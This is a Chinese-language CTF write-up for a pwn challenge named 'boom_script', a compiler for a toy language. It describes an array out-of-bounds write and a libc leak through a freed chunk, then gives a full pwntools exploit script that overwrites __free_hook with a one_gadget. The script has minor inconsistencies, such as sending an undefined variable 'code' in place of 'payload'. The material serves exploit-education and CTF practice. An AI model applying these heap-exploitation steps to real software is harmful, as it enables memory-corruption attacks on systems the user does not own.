RELRO没开。
程序本身的逻辑是实现了一个boom语言的编译器,我们输入boom语言会给我们编译。
但是对于我们做题人来讲,因为程序体量太大,我们逆向起来会非常麻烦,所以我们结合他一些可能会出漏洞的地方,进行一些猜测并尝试。
我们最后将漏洞点放在了他的array,也就是数组的地方。
猜测他数组可以造成越界。
我们来检查一下对不对。
我们就简单的
array arr[30];
arr[25]=1;
arr[26]=1;
arr[27]=1;
arr[28]=1;
arr[29]=1;
arr[32]=1;
我们明显发现有越界,现在的问题就是如何能把这个越界利用起来。
首先我们要再去看一下malloc、free函数是在什么情况下使用的,便于我们使用数组越界进行利用。
我们结合代码,结合我们的调试我们发现,字符串的赋值功能就是释放掉原来的chunk然后再申请一个chunk。
我们通过阅读代码发现
程序通过这个地方来决定使用的是什么功能。
我们要注意到prints功能。注意到prints的功能对应的数字是0x8a
找到实现这个功能的函数我们可以通过prints一个小字符串,来泄露chunk残留的libc地址。
那么我们的利用过程如下:
通过字符串赋值来获得一个大点的chunk。然后通过prints泄露libc地址
剩下的我们就正常还是通过赋值得到chunk然后越界写就好了。
exp部分有参考小绿草的大佬,表示感谢!
from pwn import*
context.log_level='debug'
context.arch='amd64'
context.os = "linux"
local = 1
if local:
r = process('./boom_script')
else:
r = remote("192.168.40.178",8999)
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
def debug():
gdb.attach(r)
pause()
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
payload = ""
payload += "array a[1];"
payload += "array b[1];"
payload += "str=\""+"a"*0x500+"\";"
payload += "str=\""+"a"*0x800+"\";"
payload += "prints(\" \");"
payload += "libc_base=0;"
payload += "inputn(libc_base);"
payload += "free_hook=libc_base+"+str(0x18c8)+";"
payload += "one_gadget=libc_base+"+str(0x4497f)+";"
payload += "str=\""+"a"*0x68+"\";"
payload += "str1=\""+"a"*0x8+"\";"
payload += "str2=\""+"a"*0x8+"\";"
payload += "str2=\""+"a"*0x28+"\";"
payload += "str1=\""+"a"*0x28+"\";"
payload += "a[5]=free_hook;"
payload += "str3=\""+"a"*0x8+"\";"
payload += "array c[0];"
payload += "c[0]=one_gadget;"
payload += "str1=\""+"\x00"*0x8+"\";"
sla("$", "1")
sla("length:\n", str(len(code)))
debug()
sla("code:\n", code)
libc_base = u64(ru('\x7f')[-6:] + '\x00\x00')
lg("libc_base", libc_base)
sd(p64(libc_base))
ti()